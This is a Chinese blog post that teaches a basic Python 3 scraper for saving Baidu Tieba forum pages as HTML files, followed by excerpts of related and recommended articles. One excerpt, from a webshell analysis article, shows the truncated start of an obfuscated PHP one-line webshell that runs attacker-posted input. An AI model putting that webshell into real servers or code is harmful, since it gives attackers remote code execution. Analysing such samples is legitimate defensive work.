Python3---爬虫---抓取百度贴吧

前言

该文章主要描述如何抓取百度贴吧内容。当然是简单爬虫实现功能，没有实现输入参数过滤等辅助功能，仅供小白学习。

修改时间：20191219

天象独行

import os,urllib.request,urllib.parse

'''

    测试要求：

        1；输入吧名，首页，结束页进行爬虫。

        2；创建一个以吧名为名字的文件夹，里面是每一页的html的内容，文件名格式：吧名_page.html

'''

url = "https://tieba.baidu.com/f?"

ba_name = input("请输入需要下载的吧名： ")

home_page = int(input("请输入首页："))

end_page = int(input("请输入结束页："))

#创建一个路径变量：

path = "C:\\Users\\aaron\\Documents\\Python3-test"

os.makedirs(path)

'''

    pn = 0  第一页

    pn = 50 第二页

    pn = 100 第三页

    。。。。

    pn = (n-1)*50 第n页

'''

for page in range(home_page,end_page+1):

    #构造请求参数字典

    data = {

        "kw":ba_name,

        "ie":"urt-8",

        "pn":(page-1)*50

    }

    #构造请求hearders头

    #构造请求参数

    url_get = urllib.parse.urlencode(data)

    #构造请求url

    url_get = url + url_get

    #请求url

    request = urllib.request.urlopen(url_get)

    #创建一个文件名

    filename = ba_name + '_' + str(page) + '.html'

    #拼接文件路径

    filepath = path + '\\' + filename

    print(filepath)

    #写入内容

    with open(filepath,'wb') as fp:

        fp.write(request.read())

执行结果：

Python3---爬虫---抓取百度贴吧的更多相关文章

笔趣看小说Python3爬虫抓取
笔趣看小说Python3爬虫抓取获取HTML信息解析HTML信息整合代码获取HTML信息 # -*- coding:UTF-8 -*- import requests if __name__ ...
使用Python3爬虫抓取网页来下载小说
很多时候想看小说但是在网页上找不到资源,即使找到了资源也没有提供下载,小说当然是下载下来用手机看才爽快啦! 于是程序员的思维出来了,不能下载我就直接用爬虫把各个章节爬下来,存入一个txt文件中,这样, ...
关于Python3爬虫抓取网页Unicode
import urllib.requestresponse = urllib.request.urlopen('http://www.baidu.com')html = response.read() ...
python3爬虫抓取智联招聘职位信息代码
上代码,有问题欢迎留言指出. # -*- coding: utf-8 -*- """ Created on Tue Aug 7 20:41:09 2018 @author ...
Python3简单爬虫抓取网页图片
现在网上有很多python2写的爬虫抓取网页图片的实例,但不适用新手(新手都使用python3环境,不兼容python2), 所以我用Python3的语法写了一个简单抓取网页图片的实例,希望能够帮助到 ...
Python爬虫之小试牛刀——使用Python抓取百度街景图像
之前用.Net做过一些自动化爬虫程序,听大牛们说使用python来写爬虫更便捷,按捺不住抽空试了一把,使用Python抓取百度街景影像. 这两天,武汉迎来了一个德国总理默克尔这位大人物,又刷了一把武汉 ...
PHP网络爬虫实践：抓取百度搜索结果，并分析数据结构
百度的搜索引擎有反爬虫机制,我先直接用guzzle试试水.代码如下: <?php /** * Created by Benjiemin * Date: 2020/3/5 * Time: 14:5 ...
python3 - 通过BeautifulSoup 4抓取百度百科人物相关链接
导入需要的模块需要安装BeautifulSoup from urllib.request import urlopen, HTTPError, URLError from bs4 import Be ...
Python抓取百度百科数据
前言本文整理自慕课网<Python开发简单爬虫>,将会记录爬取百度百科"python"词条相关页面的整个过程. 抓取策略确定目标:确定抓取哪个网站的哪些页面的哪部分 ...
Python爬虫 - 爬取百度html代码前200行
Python爬虫 - 爬取百度html代码前200行 - 改进版, 增加了对字符串的.strip()处理源代码如下: # 改进版, 增加了 .strip()方法的使用 # coding=utf-8 ...

随机推荐

WebShell代码分析溯源(三)
WebShell代码分析溯源(三) 一.一句话变形马样本 <?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[ge ...
js 对只包含简单类型数据的对象为元素组成的数组进行去重
/** * 对于由简单类型数据组成的对象为元素组成的数组进行去重操作 * @params {Array} 需要去重的对象数组 * @returns {Array} 去重后的对象数组 */ functi ...
Java基础专题
Java后端知识点汇总——Java基础专题全套Java知识点汇总目录,见https://www.cnblogs.com/autism-dong/p/11831922.html 1.解释下什么是面向对 ...
Java工程师学习指南
java学习指南-四个部分:分别是入门篇,初级篇,中级篇,高级篇第一步是打好Java基础,掌握Java核心技术, ...
松软科技web课堂:JavaScript 数组方法
JavaScript 数组的力量隐藏在数组方法中. 把数组转换为字符串 JavaScript 方法 toString() 把数组转换为数组值(逗号分隔)的字符串. 实例 var fruits = [& ...
linux学习（五）用户与组管理命令，以及用户信息文件解释
目录 (1)/etc/passwd文件 (2)/etc/shadow passwd命令 userdel命令 usermod命令 groupadd @(用户与组管理命令) linux是一个多用户多任务的 ...
ACM 基本输入
单次输入 C语言 int a,b; scanf("%d %d",&a,&b); C++语言 int a,b; cin >> a >> b; ...
进一步使用模板缓冲（stencil）
最近做课题的时候需要计算一个 view(就是一次渲染得到的帧) 下的重叠像素个数(两个物体或更多的物体重叠). 最开始我的想法是渲染一个物体输出一张纹理,这样对比物体之间的纹理就知道重叠了.但是这样当 ...
new String(request.getParameter("userID").trim().getBytes("8859_1"))的含义是什么？
new String(request.getParameter("userID").trim().getBytes("8859_1")) request.get ...
rabbit mq 手动重试机制
消息手动确认模式的几点说明监听的方法内部必须使用channel进行消息确认,包括消费成功或消费失败如果不手动确认,也不抛出异常,消息不会自动重新推送(包括其他消费者),因为对于rabbitmq来说 ...

Python3---爬虫---抓取百度贴吧

Python3---爬虫---抓取百度贴吧的更多相关文章

随机推荐

热门专题